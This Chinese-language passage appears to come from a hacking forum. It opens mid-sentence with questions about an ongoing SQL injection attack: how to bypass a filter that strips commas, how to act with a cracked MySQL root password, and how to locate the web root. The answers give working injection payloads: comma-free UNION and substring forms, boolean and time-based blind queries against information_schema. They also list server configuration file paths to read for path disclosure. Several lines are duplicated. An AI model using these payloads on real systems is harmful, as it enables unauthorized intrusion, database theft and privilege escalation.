,在union select 1,2,3,4逗号被吃掉了。请问有没有好的解决方法。
2.当前数据库用户是abcd,列出来数据库有mysql,最终破解了root密码。但是当前的数据库用户abcd不能导出文件什么的,请问能不能把用户“切换”为root?
3.实在是找不到网站目录,passwd读了,Apache配置文件什么的,找不到,估计更改默认安装路径了。还有那些文件会泄露web目录呢?
解答二:
2.当前数据库用户是abcd,列出来数据库有mysql,最终破解了root密码。但是当前的数据库用户abcd不能导出文件什么的,请问能不能把用户“切换”为root?
3.实在是找不到网站目录,passwd读了,Apache配置文件什么的,找不到,估计更改默认安装路径了。还有那些文件会泄露web目录呢?
解答一:
1 . UNION (SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d ))
2 . 当前应该就是root权限吧?否则怎么读mysql.user的 ?
3 . web目录路径:
2 . 当前应该就是root权限吧?否则怎么读mysql.user的 ?
3 . web目录路径:
如果采用RPM包安装,安装路径应在 /etc/httpd目录下
apache配置文件:/etc/httpd/conf/httpd.conf
Apache模块路径:/usr/sbin/apachectl
web目录:/var/www/html
如果采用源代码安装,一般默认安装在/usr/local/apache2目录下
/etc/httpd/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-vhosts.conf
1,ord(mid(admim,1,1))改成ord(mid(admim from 1 for 1))然后用group_concat联合注射,不然单个猜解注射的话要limit 0,1这里不能用0 for 1
或者:
或者:
and (select ord(mid(group_concat(SCHEMA_NAME) from 3 for 1)) from information_schema.schemata)>0
要是显错注射的话这个你就更懂了,延时注射不能用if,只能用case when 1=1 then sleep(1) else null end
要是显错注射的话这个你就更懂了,延时注射不能用if,只能用case when 1=1 then sleep(1) else null end
2,能load_file是因为给了当前用户file_priv权限,能爆出ROOT密码应该是误操作本来想把当前数据库权限给完,结果给了所有库。不能在SQL语句直接切换,还是得看允许外连否,装没装phpmyadmin等
3,在linux下还有proc/self/environ,就那些配置文件,既然是注入点着手的,配置文件没办法就想想注入点的报错